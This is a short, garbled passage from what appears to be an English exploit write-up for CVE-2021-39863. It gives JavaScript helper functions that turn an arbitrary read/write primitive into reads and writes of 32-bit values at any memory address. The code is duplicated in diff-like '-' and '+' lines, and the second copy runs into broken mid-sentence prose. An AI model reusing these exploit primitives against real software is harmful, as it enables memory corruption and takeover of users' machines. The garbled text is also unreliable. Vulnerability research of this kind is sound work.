[Eng] CVE-2021-39863 Exploit

 With the VA of the R/W primitive, you can access any memory area by its address.

-function readUint32(dataView, readAddr) { var offsetAddr = readAddr - StartAddr; if (offsetAddr < 0) { offsetAddr = offsetAddr + 0xFFFFFFFF + 1; } return dataView.getUint32(offsetAddr, true); } function writeUint32(dataView, writeAddr, value) { var offsetAddr = writeAddr - StartAddr; if (offsetAddr < 0) { offsetAddr = offsetAddr + 0xFFFFFFFF + 1 } return dataView.setUint32(offsetAddr, value, true); }
+function readUint32(dataView, readAddr) { var offsetAddr = readAddr - StartAddr; if (offsetAddr < 0) { offsetAddr = offsetAddr + 0xFFFFFFFF + 1; } return dataView.getUint32(offsetAddr, true); } function writeUint32(dataView, writeAddr, value) { var offsetAddr = writeAddr - StartAddr; if (offsetAddr < 0) { offsetAddr = offsetAddr + 0xFFFFFFFF + 1 } return dataView.setUint32(offsetAddr, value, true); }- The two functions mentioned above serve as helper functions that assist in controlling the values pointed to by arbitrary VAs (

 The operation of the Helper Functions is as follows: